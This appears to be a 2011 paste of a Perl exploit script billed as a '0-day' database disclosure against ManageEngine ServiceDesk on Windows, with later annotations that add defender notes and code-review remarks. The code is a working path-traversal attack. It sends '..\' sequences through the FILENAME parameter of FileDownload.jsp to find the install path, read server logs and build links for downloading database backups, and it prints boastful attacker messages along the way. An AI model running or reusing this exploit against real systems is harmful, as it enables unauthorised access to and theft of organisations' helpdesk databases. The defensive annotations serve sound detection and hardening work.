
Exploit for ServiceDesk v *.* OS: Windows

a guest
Jul 7th, 2011
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. use File::stat;
     # Top-level driver. Flow, as visible below: print a banner, locate the
     # install directory (getInstallPathWin), read server logs for backup
     # locations (getServerOutLogs), then write one link per candidate backup
     # file to db_backups.html (downloadBackups).
     #
     # Every request built in this file goes to $url . $path with the query
     # "module=agent&path=./&delete=false&FILENAME=" followed by a run of "..\"
     # segments, i.e. a path traversal through the FILENAME parameter.
     #
     # Defender view: requests to /workorder/FileDownload.jsp whose FILENAME
     # value contains "..\" (possibly percent-encoded in access logs) are the
     # server-side trace of this script. On the handler side, the requested
     # name should be canonicalised and refused when it resolves outside the
     # intended download directory.
     #
     # NOTE(review): there is no "use strict" / "use warnings"; every variable
     # below is a package global shared between this main flow and the subs.
  4.  
  5. $ptxt="
  6. #################################################
  7. # _____             _         ____          _  
  8. #|   __|___ ___ _ _|_|___ ___|    \ ___ ___| |_
  9. #|__   | -_|  _| | | |  _| -_|  |  | -_|_ -| '_|
  10. #|_____|___|_|  \_/|_|___|___|____/|___|___|_,_|
  11. #                                            
  12. #################################################
  13.  
  14. [0-day] [Database disclosure]
  15. [desc: Exploit for ServiceDesk v *.* OS: Windows]
  16.  
  17. ";
  18. print $ptxt;
  19.  
      # One shared user agent; the subs read this package global directly.
  20. $ua=LWP::UserAgent->new();
  21.  
      # Base URL (loopback as published) and the endpoint every request targets.
  22. $url="http://127.0.0.1";
  23. $path="/workorder/FileDownload.jsp";
  24.  
  25.  
      # NOTE(review): getInstallPathWin returns 0, not "", when it finds nothing,
      # so the else branch below is not taken in that case.
  26. $installPath=&getInstallPathWin($url,$path);
  27.  
  28. if ($installPath ne "") {
  29.     @backups=&getServerOutLogs($url,$path,$installPath);
  30. } else {
  31.     print "Install path not found :(\n";
  32.     exit();
  33. }
  34.  
      # Each element of @backups is a "DIR --- FILENAME" string.
  35. if (scalar(@backups)>0) {
  36.     print "hehe.. We got paths to backup files..\n If they are on the same drive and exists - we will own their world!!\n";
  37.     foreach $backLine (@backups) {
              # @backInfo is only used by the commented-out print below;
              # downloadBackups splits the line again itself.
  38.         @backInfo=split(/ --- /,$backLine);
  39.         #print "Trying to download $backInfo[1] from $backInfo[0]...\n";
  40.         &downloadBackups($url,$path,$backLine);
  41.     }
  42. }
      # Remove the baseline response file that getServerOutLogs writes to the
      # current directory.
  43. unlink("bad");
  44.  
      # The result is a local HTML file of links; downloadBackups, as pasted,
      # does not fetch anything itself.
  45. print "Dude, check out \'db_backups.html\'\n";
  47.  
  48. sub downloadBackups {
          # Record one candidate backup URL as a link in db_backups.html.
          #
          # Arguments: $url (base URL), $path (endpoint path), $backLine (a
          #   "DIR --- FILENAME" string as returned by getServerOutLogs).
          # Returns: no explicit return value.
          # Side effects: appends one <a> element to db_backups.html in the
          #   current directory; overwrites the package globals @backInfo and
          #   $backupUrl.
  49.     my ($url,$path,$backLine) = @_;
  50.     @backInfo=split(/ --- /,$backLine);
          # Inside the double-quoted string "\&" yields "&" and "\\" yields "\",
          # so FILENAME is a run of "..\" segments followed by the directory and
          # the file name. This is the request shape to look for in web logs.
  51.     $backupUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\$backInfo[0]$backInfo[1]";
          # The fetch itself is commented out in the paste; only the link is
          # written.
  52.     #$br=$ua->get($backupUrl);
  53.     #if ($br->is_success) {
  54.     #   open(A,">$backInfo[1]");
  55.     #   print A $br->content;
  56.     #   close(A);
  57.     #}
          # NOTE(review): open() is unchecked and uses a bareword handle; the
          # directory and file name are written into the HTML without escaping.
  58.     open(A,">>db_backups.html");
  59.     print A "<a href='$backupUrl'>$backInfo[1]</a><br>\n";
  60.     close(A);
  61. }
  62.  
  63.  
  64.  
  65. sub getServerOutLogs {
          # Read the server's serverout<n>.txt logs through the same FILENAME
          # traversal and derive backup directory / file-name candidates.
          #
          # Arguments: $url, $path (base URL and endpoint); $installPath, the
          #   install directory, interpolated directly before
          #   "server\default\log\".
          # Returns: the package global @backupFiles, a list of
          #   "DIR --- FILENAME" strings (two per directory the operator
          #   confirms on STDIN).
          # Side effects: HTTP GETs through the global $ua; writes "bad" and
          #   "<n>.txt" in the current directory; reads STDIN; calls exit()
          #   when no backup line is found.
          #
          # Defender view: what is read here is log content that reveals the
          # backup directory and the build number, from which the backup file
          # name is then derived. Reading it depends on the FILENAME value
          # being accepted with "..\" segments.
  66.     my ($url,$path,$installPath) = @_;
  67.    
          # Baseline request: a log name with a long digit run, presumably one
          # that does not exist, so its response size can be compared with real
          # hits. ${i} is the package global with whatever value earlier code
          # left in it; it is not set in this sub before this line.
  68.     $badUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout11111111111${i}.txt";
  69.     $br=$ua->get($badUrl);
  70.     if ($br->is_success) {
  71.         open(A,">bad");
  72.         print A $br->content;
  73.         close(A);
  74.     }
  75.  
          # Request serverout0.txt .. serverout10.txt and keep only responses
          # whose size differs from the baseline file.
          # NOTE(review): if the baseline request failed, "bad" was never
          # written; stat("bad") would then presumably fail and the ->size call
          # abort the script. Confirm against File::stat.
  76.     for ($i=0;$i<=10;$i++) {
  77.         $logUrl="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\${installPath}server\\default\\log\\serverout${i}.txt";
  78.         $br=$ua->get($logUrl);
  79.         if ($br->is_success) {
  80.             open(A,">${i}.txt");
  81.             print A $br->content;
  82.             close(A);
  83.             if (stat("bad")->size!=stat("${i}.txt")->size) {
  84.             } else {
                      # Same size as the baseline: treated as "not a real log".
  85.                 unlink("${i}.txt");
  86.             }
  87.         }
  88.     }
  89.  
          # Parse whatever logs were kept, then delete them.
  90.     for ($i=0;$i<=10;$i++) {
  91.         if (-e "${i}.txt") {
  92.             open(A,"${i}.txt");
  93.             @log=<A>;
  94.             close(A);
  95.             foreach $line (@log) {
                      # The first "Build number ...: <digits>|" seen sets
                      # $sdBuild; later matches are ignored.
  96.                 if ($line=~/: Build number(.*): ([0-9]+)\|/) {
  97.                     $tBuild=$2;
  98.                     if ($sdBuild eq "") {
  99.                         $sdBuild=$tBuild;
  100.                     }
  101.                 }
                       # A [SYSOUT] line carrying "BACKUPDIR=<dir>, ATTACHMENT="
                       # yields a candidate: <dir> plus a file name built from
                       # the numeric fields of the two bracketed stamps.
                       # XBUILDX is a placeholder filled in further down.
  102.                 if ($line=~/\[([0-9]+):([0-9]+):([0-9]+):([0-9]+)\]\|\[([0-9]+)-([0-9]+)-([0-9]+)\]\|\[SYSOUT\](.*)BACKUPDIR=(.*), ATTACHMENT=/) {
  103.                     push(@backups,"$9 --- backup_servicedesk_XBUILDX_database_${5}_${6}_${7}_${1}_${2}.data");
  104.                    
  105.                 }
  106.             }
  107.             unlink("${i}.txt");
  108.         }
  109.     }
  110.    
           # @backups is the same package global the caller assigns this sub's
           # return value to.
  111.     if (scalar(@backups)>0) {
  112.         print "Man, you are realy lucky! We found some info about ServiceDesk backups..\nBUT, I need your help now, hehe\nLet's construct directories!\np.s. type without drive letter, like \\backup\\\n";
  113.     } else {
  114.         print "Bad luck.. Check your karma, seriously..Where is my fucking latte!?!?\np.s. No info about backups was found :(";
  115.         exit();
  116.     }
  117.    
           # For each candidate: substitute the build number, show the logged
           # directory ("Trash Dir"), and read the directory to use from STDIN.
           # An empty answer skips the entry.
  118.     foreach $mb (@backups) {
  119.         $mb=~s/XBUILDX/$sdBuild/gi;
  120.         @dir=split(/ --- /,$mb);
  121.         print "Trash Dir: $dir[0]\n";
  122.         print "Right Dir: ";
  123.         chomp($rDir=<STDIN>);
  124.         if ($rDir ne "") {
                   # Two names are queued per confirmed directory: the
                   # "database" one and the same name with "database" replaced
                   # by "fullbackup".
  125.             $fullDB=$dir[1];
  126.             $fullDB=~s/database/fullbackup/gi;
  127.             push(@backupFiles,"$rDir --- $dir[1]");
  128.             push(@backupFiles,"$rDir --- $fullDB");
  129.         }
  130.     }
  131.     return @backupFiles;
  132. }
  133.  
  134.  
  135.  
  136.  
  137. sub getInstallPathWin {
           # Guess the install directory by requesting known files under each
           # candidate path and comparing response sizes with a control request.
           #
           # Arguments: $url (base URL), $path (endpoint path).
           # Returns: the chosen entry of @paths (with trailing backslash), or 0
           #   when no candidate scored above 1.
           # Side effects: up to 10 HTTP GETs through the global $ua (2 paths x
           #   5 files); temporary files named "<i><k>" in the current
           #   directory, removed before returning; prints a verdict.
  138.     my ($url,$path) = @_;
  139.     $url1="${url}${path}?module=agent\&path=./\&delete=false\&FILENAME=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\";
  140.     @paths=("ServiceDesk\\","ManageEngine\\ServiceDesk\\");
           # The first entry is a random-looking name, presumably absent on any
           # install; its response size is the "not found" baseline. Defender
           # view: that literal string is a searchable indicator in web server
           # access logs.
  141.     @checkFiles=("dashgjifyq8412348fhsjfghjqw.txt","COPYRIGHT","logs\\configport.txt","bin\\run.bat","server\\default\\log\\boot.log");
           # Pass 1: fetch every path/file combination and save each successful
           # response body to a file named "<path index><file index>".
  142.     $i=0;
  143.     foreach $p (@paths) {
  144.         $k=0;
  145.         foreach $f (@checkFiles) {
  146.             $checkUrl="${url1}${p}${f}";
  147.             $br=$ua->get($checkUrl);
  148.             if ($br->is_success) {
  149.                 open(A,">${i}${k}");
  150.                 print A $br->content;
  151.                 close(A);
  152.             }
  153.             $k++;
  154.         }
  155.         $i++;
  156.     }
           # Pass 2: per path, $ok counts the probe files (k >= 1) whose saved
           # size differs from the control file (k == 0).
           # NOTE(review): $incorrectSize is assigned only when the k == 0 file
           # exists, so a failed control request leaves the previous value (or
           # none) in place.
  157.     for ($i=0;$i<scalar(@paths);$i++) {
  158.         $ok=0;
  159.         for ($k=0;$k<scalar(@checkFiles);$k++) {
  160.             if (-e "${i}${k}") {
  161.                 if ($k==0) {
  162.                     $incorrectSize=stat("${i}${k}")->size;
  163.                 } else {
  164.                     if (stat("${i}${k}")->size!=$incorrectSize) {
  165.                         $ok++;
  166.                     }
  167.                 }
  168.             }
  169.         }
               # 4 means all four probe files differed; 3 and 2 are accepted
               # with weaker wording; 1 sets nothing. A later path that also
               # scores above 1 overwrites $ret.
  170.         if ($ok>0) {
  171.             if ($ok==4) {
  172.                 print "You are lucky! \nServiceDesk installed to: $paths[$i]\n";
  173.                 $ret=$paths[$i];
  174.             } elsif ($ok>2) {
  175.                 print "I think ServiceDesk installed to: $paths[$i]\n";
  176.                 $ret=$paths[$i];
  177.             } elsif ($ok>1) {
  178.                 print "You are lucky if ServiceDesk installed to: $paths[$i]\n";
  179.                 $ret=$paths[$i];
  180.             }
  181.         }
  182.     }
  183.  
  184.  
           # Clean up the temporary response files. This loop leaves the package
           # global $i equal to scalar(@paths).
  185.     for ($i=0;$i<scalar(@paths);$i++) {
  186.         for ($k=0;$k<scalar(@checkFiles);$k++) {
  187.             unlink("${i}${k}");
  188.         }
  189.     }
  190.  
           # Failure is reported as 0, not as an empty string.
  191.     if ($ret eq "") {
  192.         print "Bad luck man :\/\n";
  193.         $ret=0;
  194.     }
  195.     return $ret;
  196. }